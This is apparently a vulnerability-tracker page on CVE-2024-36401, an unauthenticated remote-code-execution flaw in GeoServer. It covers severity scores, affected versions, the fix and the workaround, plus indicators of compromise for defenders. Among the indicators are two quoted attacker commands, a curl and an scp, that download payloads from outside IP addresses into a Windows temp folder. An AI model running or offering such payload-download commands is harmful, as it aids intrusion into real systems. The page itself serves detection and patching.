cbcvebase.
CVE-2024-36401
published 2024-07-01

CVE-2024-36401: GeoServer is an open source server that allows users to share and edit geospatial data. Prior to versions 2.22.6, 2.23.6, 2.24.4, and 2.25.2, multiple OGC…

PriorityP198critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2024-08-05
Exploited in the wild
EPSS
99.81%
100.0th percentile
GeoServer is an open source server that allows users to share and edit geospatial data. Prior to versions 2.22.6, 2.23.6, 2.24.4, and 2.25.2, multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions. The GeoTools library API that GeoServer calls evaluates property/attribute names for feature types in a way that unsafely passes them to the commons-jxpath library which can execute arbitrary code when evaluating XPath expressions. This XPath evaluation is intended to be used only by complex feature types (i.e., Application Schema data stores) but is incorrectly being applied to simple feature types as well which makes this vulnerability apply to **ALL** GeoServer instances. No public PoC is provided but this vulnerability has been confirmed to be exploitable through WFS GetFeature, WFS GetPropertyValue, WMS GetMap, WMS GetFeatureInfo, WMS GetLegendGraphic and WPS Execute requests. This vulnerability can lead to executing arbitrary code. Versions 2.22.6, 2.23.6, 2.24.4, and 2.25.2 contain a patch for the issue. A workaround exists by removing the `gt-complex-x.y.jar` file from the GeoServer where `x.y` is the GeoTools version (e.g., `gt-complex-31.1.jar` if running GeoServer 2.25.1). This will remove the vulnerable code from GeoServer but may break some GeoServer functionality or prevent GeoServer from deploying if the gt-complex module is needed.

Affected

12 ranges
VendorProductVersion rangeFixed in
geoservergeoserver< 2.22.62.22.6
geoservergeoserver
geoservergeoserver
geoservergeoserver
geoservergeoserver>= 2.23.0 < 2.23.62.23.6
geoservergeoserver>= 2.24.0 < 2.24.42.24.4
geoservergeoserver>= 2.25.0 < 2.25.22.25.2
geotoolsgeotools< 29.629.6
geotoolsgeotools
geotoolsgeotools
geotoolsgeotools>= 30.1 < 30.430.4
geotoolsgeotools>= 31.1 < 31.231.2

Detection & IOCsextracted from sources · hover to see the quote

ip167.172.89.142
ip152.42.243.170
pathc:\windows\temp\
filenameSystemsetting.dll
filenameSystemsetting.exe
commandcurl --connect-timeout 3 -m 10 -o c:\windows\temp\{file name} http://167[.]172[.]89[.]142/{file name}
commandcmd /c "scp -P 23 -o StrictHostKeyChecking=no -o ConnectTimeout=3 -o UserKnownHostsFile=C:\windows\temp\ t1sc@152[.]42[.]243[.]170:/tmp/bd/{file name} c:\windows\temp\"
otherCobalt Strike watermark: 666666
  • Hunt for outbound SCP connections on port 23 (non-standard) from GeoServer hosts, particularly to 152.42.243.170, as used for lateral payload staging.
  • Exploitation is confirmed across WFS GetFeature, WFS GetPropertyValue, WMS GetMap, WMS GetFeatureInfo, WMS GetLegendGraphic, and WPS Execute OGC request types — monitor all six for anomalous property name values containing XPath/expression syntax.
  • Shadowserver observed CVE-2024-36401 attacks starting on July 9, 2024; use this date as a baseline for retrospective log hunting on GeoServer OGC request logs.
  • ·The vulnerability affects ALL GeoServer instances (not just those using complex/Application Schema feature types) because XPath evaluation is incorrectly applied to simple feature types as well.
  • ·Workaround of removing gt-complex-x.y.jar may break GeoServer functionality or prevent deployment if the gt-complex module is required; patching to 2.22.6, 2.23.6, 2.24.4, or 2.25.2 is preferred.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.